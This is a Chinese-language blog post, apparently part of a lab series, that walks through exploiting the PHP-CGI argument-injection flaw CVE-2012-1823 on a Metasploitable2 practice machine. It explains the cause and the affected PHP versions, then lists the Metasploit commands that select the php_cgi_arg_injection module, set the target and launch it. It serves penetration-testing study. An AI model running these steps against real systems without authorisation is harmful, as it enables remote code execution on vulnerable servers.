Metasploitable2靶机之第十篇--PHP CGI参数注入执行漏洞(cve-2012-1823) 傷城~ 2022-10-22 02:46 307阅读 0赞 ### 文章目录 ### * * * 环境 * 原理 * 影响版本 * 漏洞利用 * * * 第一步 ,启动MSF * 第二步选择漏洞库 * 第三步 设置参数,开始攻击 * 第四步 利用成功, * 摘抄 ### 环境 ### <table> <thead> <tr> <th>主机</th> <th>地址</th> </tr> </thead> <tbody> <tr> <td>Metasploitable2</td> <td>192.168.232.202</td> </tr> <tr> <td>kali-linux</td> <td>192.168.232.129</td> </tr> </tbody> </table> ### 原理 ### * 用户请求的querystring被作为了php-cgi的参数,最终导致了一系列结果。 * 探究一下原理,RFC3875中规定,当querystring中不包含没有解码的=号的情况下,要将querystring作为cgi的参数传入。 * 所以,Apache服务器按要求实现了这个功能。 * apache在解析.php文件时会把接收到的url参数通过mod\_cgi模块交给后端的php-cgi处理,而传递过程中未对参数进行过滤,导致php-cgi会把用户输入当作php参数执行 ### 影响版本 ### * php < 5.3.12 * php < 5.4.2 ### 漏洞利用 ### ##### 第一步 ,启动MSF ##### msfconsole ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70] ##### 第二步选择漏洞库 ##### use exploit/multi/http/php_cgi_arg_injection ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1] ##### 第三步 设置参数,开始攻击 ##### show options Set RHOST 192.168.160.131 设置要攻击的IP exploit ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2] ##### 第四步 利用成功, ##### ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3] ### 摘抄 ### -------------------- 抛开内心的阴霾,天气回暖,春天回归, 一切都会越来越好。 -------------------- [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]: /images/20221022/b8e576caf9db405785f88f11334dbf5d.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]: /images/20221022/c9cb9adfd6d44862bbfd3f9154d950df.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]: /images/20221022/42499d351e784354b09b972695ef0695.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]: /images/20221022/0f31f0d374c8460992baa8250cfdf655.png
相关 Metasploitable2靶机之第四篇--Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447) Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447)描述 Samba是Samba团队开发的一套可使UNIX系列的操作系统与微软Windo Love The Way You Lie/ 2022年11月16日 01:44/ 0 赞/ 344 阅读
相关 Metasploitable2靶机之第三篇--Tomcat管理台弱口令漏洞 文章目录 环境搭建 描述 影响版本 漏洞利用 第一步 矫情吗;*/ 2022年11月16日 01:44/ 0 赞/ 224 阅读
相关 Metasploitable2靶机之第一篇--弱口令漏洞 文章目录 环境准备 telnet 弱口令 MySQL弱口令 PostgreSQL (对 淡淡的烟草味﹌/ 2022年11月16日 01:42/ 0 赞/ 244 阅读
相关 Metasploitable2靶机之第十一篇--Druby远程代码执行漏洞 文章目录 环境 漏洞利用 第一步 ,启动MSF 第二步选择 太过爱你忘了你带给我的痛/ 2022年10月22日 02:46/ 0 赞/ 220 阅读
相关 Metasploitable2靶机之第十篇--PHP CGI参数注入执行漏洞(cve-2012-1823) 文章目录 环境 原理 影响版本 漏洞利用 第一步 , 傷城~/ 2022年10月22日 02:46/ 0 赞/ 308 阅读
相关 Metasploitable2靶机之第八篇--UnreallRCd后门漏洞 文章目录 环境 漏洞利用 第一步 启动metasploit 电玩女神/ 2022年10月22日 02:46/ 0 赞/ 249 阅读
相关 Metasploitable2靶机之第九篇--Java RMI SERVER 命令执行漏洞 文章目录 环境 原理 漏洞利用 第一步 ,查看1099端口是否开启 ゝ一纸荒年。/ 2022年10月22日 02:46/ 0 赞/ 294 阅读
相关 Metasploitable2靶机之第七篇--Distcc后门漏洞 文章目录 环境 原理 漏洞利用 第一步 ,启动metasploit 约定不等于承诺〃/ 2022年10月22日 01:40/ 0 赞/ 242 阅读
Love The Way You Lie
太过爱你忘了你带给我的痛
傷城~
小鱼儿
还没有评论,来说两句吧...